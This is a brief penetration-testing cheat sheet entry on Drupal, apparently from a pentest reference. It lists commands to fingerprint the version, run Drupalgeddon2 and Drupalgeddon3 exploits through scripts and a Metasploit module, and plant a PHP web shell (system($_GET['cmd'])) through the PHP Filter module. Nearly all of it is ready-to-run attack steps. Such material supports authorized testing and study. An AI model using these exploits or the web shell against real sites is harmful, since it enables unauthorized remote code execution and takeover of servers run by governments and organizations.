Drupal
What it is: Enterprise-grade CMS used by governments and large organizations. Known for critical unauthenticated RCE vulnerabilities (Drupalgeddon series). Always check the version via CHANGELOG.txt.
Default ports: 80, 443
Vuln research:
Identify Drupal version
Check CHANGELOG.txt or meta tags — Version determines exploit path
curl -s http://$IP/CHANGELOG.txt | head -5
curl -s http://$IP/ | grep 'name="Generator"'
droopescan scan drupal -u http://$IP/
Example Output
Drupal 7.57, 2018-02-21
(Drupal 7 < 7.58 = Drupalgeddon2)
Drupalgeddon2 (CVE-2018-7600)
Unauthenticated RCE on Drupal < 7.58 — One of the most reliable exploits
python3 drupalgeddon2.py http://$IP/
# Or use Metasploit:
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS $IP
run
Drupalgeddon3 (CVE-2018-7602)
Authenticated RCE on Drupal < 7.59 — Requires any valid user account
python3 drupa7-CVE-2018-7602.py http://$IP/ -u admin -p password -c "id"
RCE via PHP Filter module
Enable PHP Filter then inject code — Requires admin access
# Modules → Enable "PHP filter"
# Content → Add content → Basic page
# Text format: PHP code
# Body: <?php system($_GET['cmd']); ?>